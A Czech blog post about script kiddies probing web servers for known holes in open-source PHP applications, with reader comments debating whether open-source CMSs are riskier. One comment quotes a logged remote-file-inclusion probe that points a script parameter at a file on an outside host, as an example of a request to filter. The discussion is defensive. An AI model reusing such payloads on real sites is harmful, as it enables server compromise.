Jednou jsem už psal o script kiddies, kteří prohledávají vaše (naše) stránky za účelem nalezení známé bezpečnostní díry. Tady je další várka testovaných adres, které jsem vybral z jednodenního logu:
Máte něco takového u sebe na serveru?
Ještě pro zajímavost – seznam User-Agent. Všechny budou zřejmě falešné, ale stojí za to se na ně podívat:
IP adresy jsou většinou z Nigérie, Brazílie, Ukrajiny apod.
„Ruční“ procházení logu je zajímavé z několika hledisek, a tak si to dávám za úkol jako regulérní činnost. Mnoho věcí je vidět lépe jak z pohledu bezpečnostní analýzy a analýzy chyb na stránkách, tak i z pohledu analýzy chování návštěvníků.
Většinou se hledají objevené díry v Open Source Software (OSS). Nemám nic proti OSS, sám ho využívám, ale musím říct, že jeho bezpečnost je opravdu vždy ohrožená. Tím, že zdrojové kódy jsou přístupné komukoliv, riziko napadení je prostě vyšší. Nápadně často se objevují zprávy o kompromitaci balíků WordPress, Joomla, phpBB apod. Jako alespoň částečné preventivní opatření mě napadá změnit názvy adresářů a možná i souborů s knihovnami při instalaci u sebe na serveru. Opatření může být samozřejmě více a mnohem lepších, ale jako první pomoc to může posloužit. Třeba by někdo mohl udělat prográmek, který provede tyto minimální úpravy (změny názvů) automaticky i pro laiky, chystajicí se na svém serveru využívat OSS.
ok, je to tam (i kdyz nemam rad neuplne clanky na vypisu), ale na HP lupy porad zustava ten skaredy vypis. Vkladani tam totiz neni dynamicke ale prebira se jen jednou na zacatku. Tak bud to opravi nekdo z IINFO anebo tam zustane nez se zapisou dalsi 3 clanky. Stalo se to poprve takhle, mozna to bude motivovat programatora red. systemu pridat nejaky filtr pro vyber na hlavni stranku
[7] Joo... OpenBSD to je jine. Ten byl od zacatku navrhovan jako bezpecny OS. Kolik takovych OSS se ridi touto prioritou? Mozna 1 z 10000.
A pak... je tam nekolik ale
1. Sam o sobe neni zadny system bezpecny pokud neni dobre nastaven
2. Kdyz na OpenBSD nainstalujete phpBB a nebudete regulerne updatovat, tak se tam stejne dostanou kluci, co budou rozesilat z tohoto serveru podvodne emaily nebo napada dalsi servery. A jak se zda, dostanou se i v pripade kdyz budete regulerne updatovat :-/ protoze se zaplaty objevuji se zpozdenim po tom, co se chyba provali.
Nechtel jsem, aby to vyznelo, ze OSS je cely nebezpecny jako takovy. Myslim, ze je akorat dobre vedet co delam a rozumet rizikum spojenym s OSS. Obcas urcita mira rizika nevadi nebo neni kriticka vzhledem k dalsim vyhodam. Ale i tak se vyplati nezavirat oci, jinak se to vymsti. Mam s tim svou zkusenost a to je take duvod proc o tom pisi.
[10] chcete rict, ze to neplati? Nebo mate jine zkusenosti? 2 miliony stranek o hacknutem wordpress pro Vas neni dostatecny dukaz? Nenavrhuji bezpecnost bank, ale fakta jsou podle mne jasna:
- Kdyz nainstalujete phpBB na svuj server, tak se jednou dockate napadeni script-kiddies.
- Kdyz mate svuj vlastni script pro forum, nikdo nezna ani jeho kod ani bezpecnostni diry. Navic neni rozsiren na internetu, takze se ani nevyplati ten kod hledat nekde jinde.
Rikam neco spatne? "Tím, že zdrojové kódy jsou přístupné komukoliv, riziko napadení je prostě vyšší." Mate jine zkusenosti? Pokud ano, jsem na ne zvedavy.
Dobrý den.
K bezpečnosti phpBB a podobných aplikací mě napadá nainstalovat reverzní proxy, který nepovolené url, sql-injection apod. zahodí. Je to berlička pro nebezpečnou aplikaci vně firewallu, ale může to tak (nějaký čas, na určité typy útoků) fungovat.
Ad [10], [11].
Riziko napadení webu je vyšší, pokud nainstaluji open-source www aplikaci a nesleduji dění v bezpečnostní oblasti.
Riziko napadení webu také roste s rozšířeností aplikace a/nebo s její složitostí.
[12] dekuji za odkaz na reverzni proxy. Na prvni pohled zatim nechapu jak to muze fungovat, ale potrebuji se na to lepe podivat. Pokud by slo odfiltrovat adresy typu categories/resource_categories_view.php?CLASSES_ROOT=http://store.at.ua/test.txt??
pak by to mohlo pomoci. Sice jen tem, kdo si muze dovolit vlastni instalaci Apache, ale alespon neco.
Toto je zajimave - "pokud nainstaluji open-source www aplikaci a nesleduji dění v bezpečnostní oblasti." IMHO deni v bezpecnostni oblasti obecne sleduje velmi malo kdo. Z tech tisic a milionu uzivatelu Joomla, phpBB a obzvlast Wordpressu, to bude mozna 1 ze 100. A to je podle mne ten problem. Pak co znamena konkretne "sledovat deni v bezpecnostni oblasti"? Kolik casu to vyzaduje a jak casto to musim delat? Myslim, ze vetsinou to funguje tak, ze uzivatel bud je schopny sam stahnout a nainstalovat nejaky free CMS anebo casteji mu to udela nejaka firma (znamy) a bezi to, aniz by se o to nekdo dal staral.
Pokud uzivatel ma vice prostredku, aby do sveho webu investoval, vlozi je do naprogramovani nejakych dodatecnych funkci OSS, a pak vetsinou nastava ta nejhorsi situace, kdy se puvodni balik ani neda updatovat, kvuli zasahum do kodu.
V teto chvili se zacinam schylovat k tomu, ze ten, kdo je schopen a ochoten sledovat deni v oblasti bezpecnosti, nebude vubec ochoten istalovat OSS typu free PHP aplikace. Ale mozna se mylim. Zatim je to jen uvaha. Pokud by me nekdo presvedcil o opaku, budu opravdu rad. :)
[11] Navic neni rozsiren na internetu, takze se ani nevyplati ten kod hledat nekde jinde - touto větou jste vystihl hlavní podstatu útoků.
Napsat rozsáhlejší aplikaci bez chyb je téměr nemožné a je úplně jedno jestli je to open source nebo close source. Napadání počítačů je dnes byznis, ovládnutý počítač je se použije pro další, třeba pishingové útoky. Proč by někdo strácel čas nabouráváním se do aplikace, kterou používá jeden člověk, když může útočit na aplikaci, kterou používají milióny. Vy se např. oháníte útoky na redakční systémy. Ty placené, které bývají obvykle close source, používá relativně málo firem, které si to mohou dovolit. Zatím co ty zdarma si nainstaluje kdejaký Lojza z Horní Dolní. Že jsou navíc open source s tím zase tak nesouvisí.
[13] Na opravy bezpečnostních chyb tu jsou atomatické aktualizace. Opravdu sledovat je musí správci kritických serverů. Pokud mají open source, tak si to ihned sami opraví. Pokud close source, tak to mohou maximálně nějak obejít. Ostatním stačí, než se přes automatické auktualizace objeví oprava. Což bývá u open source v řádu hodin až dnů. U close source v řádu dnů až týdnů.
[14] mate urcite pravdu v tom, ze rozsirenost aplikaci je klicova. Na druhe strane, asi nebudete popirat fakt, ze je jednodussi nalezt bezpecnostni diru kdyz mam po ruce kod programu. Ten kod primo svadi aby se v nem nekdo zacal hrabat a skenovat na zname chyby. Metoda prochazeni kodu za ucelem nalezeni chyby existuje, to se neda poprit.
Zustanu u tech CMS. Jak si predstavujete automatickou aktualizaci redakcnich systemu? To jako mam dat ftp heslo na svuj server komunite neznamych vyvojaru? Anebo povolit pravo zapisu pro apache na vsechny scripty?
Chtel bych se Vas zeptat, nasadil byste osobne na kriticky server open source redakcni system? Nebo doporucil byste to nekomu?
p.s. tato debata se skutecne tyka OSS web aplikaci, nikoliv robustniho lety vyzkouseneho software jako OpenBSD, Apache apod.
[15] To jste předtím nepsal, že debata se týká jen redakčních systémů :-) Open source redakční systém bych klidně na kritický server nasadil, pokud by to byl kvalitní redakční systém. Jestli je nebo není kvalitní opět primárně s open source nesouvisí.
Co se týká automatické aktualizace, asi zde narážíme na problém Vašeho přístupu k serveru. Já se bavil o programech obecně. Pokud vy máte jen nějaký webhosting bez dalších možností, a o redační systém se staráte sám, tak to samozřejmě přináší problém.
To že zdrojové kódy usnadňují hledání chyb je pravda, ale také to usnadňuje jejich opravy. A pokud opravy nebudete aplikovat, tak budete mít problém ať už s open source nebo close source aplikacemi. Když budete mít close source redakční systém, tak v něm možná objeví méně chyb. Ale pokud to nebudete pravidelně sledovat a aktualizovat, budete ve stejných problémech.
Přečteno 86 170×
Přečteno 75 662×
Přečteno 62 206×
Přečteno 51 770×
Přečteno 51 247×